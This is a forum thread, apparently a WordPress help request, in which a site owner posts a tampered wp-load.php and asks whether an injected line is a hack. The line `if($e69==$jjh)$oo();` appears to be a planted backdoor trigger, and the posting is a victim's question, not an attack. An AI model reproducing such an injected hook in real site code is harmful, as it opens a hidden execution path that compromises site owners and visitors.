    Can I just use Duplicator to do all this for me? I just found the plugin.

    Final update. I found a video on how to fix your WP install without losing your content. I followed the procedure and the site is back up.

    Thanks guys. You’ve been a big help.

    Some additional information. I really wish somebody here would get back to me on this.

    I tried replacing the wp-load.php file with a brand new one that I just downloaded. When I did and tried bringing up the site I got a whole page of gibberish.

    I then installed a file compare program to see what the difference is between the two files. It showed this line..

    if($e69==$jjh)$oo();

    I have no idea what this is there for. Is this a hack? Is it something specific to my install?

    It falls within this section of wp-load.php

    */ /** Define ABSPATH as this file’s directory */
    if($e69==$jjh)$oo(); if ( ! defined( ‘ABSPATH’ ) ) {
    define( ‘ABSPATH’, dirname( __FILE__ ) . ‘/’ );
    } error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); /*

    I don’t know what else to try or look at. Can somebody PLEASE respond to this thread and at least give me a clue what to try next?

    Thank you.

    Also, here is the code of wp-load. Please tell me which is line 22 so I can try to debug this.

    <?php
    /**
    * Bootstrap file for setting the ABSPATH constant
    * and loading the wp-config.php file. The wp-config.php
    * file will then load the wp-settings.php file, which
    * will then set up the WordPress environment.
    *
    * If the wp-config.php file is not found then an error
    * will be displayed asking the visitor to set up the
    * wp-config.php file.
    *
    * Will also search for wp-config.php in WordPress’ parent
    * directory to allow the WordPress directory to remain
    * untouched.
    *
    * @internal This file must be parsable by PHP4.
    *
    * @package WordPress
    */

    /** Define ABSPATH as this file’s directory */
    if($e69==$jjh)$oo();

    if ( ! defined( ‘ABSPATH’ ) ) {
    define( ‘ABSPATH’, dirname( __FILE__ ) . ‘/’ );
    }

    error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );

    /*
    * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php
    * doesn’t, load wp-config.php. The secondary check for wp-settings.php has the added benefit
    * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)
    * and /blog/ is WordPress(b).
    *
    * If neither set of conditions is true, initiate loading the setup process.

    Some additional information. I just checked two other blogs of mine that are running on the same server and by accessing wp-admin, I discovered they are running version 4.6.1 so I think it is safe to assume that this blog is also running 4.6.1 as they are all set to auto update as far as I know.

    Just want to add that this blog on the same server is working fine.

    https://stevewagenheim.com/wordpresstest/

    So I do not think the php version, which according to php admin is 4.3.8, is the problem.
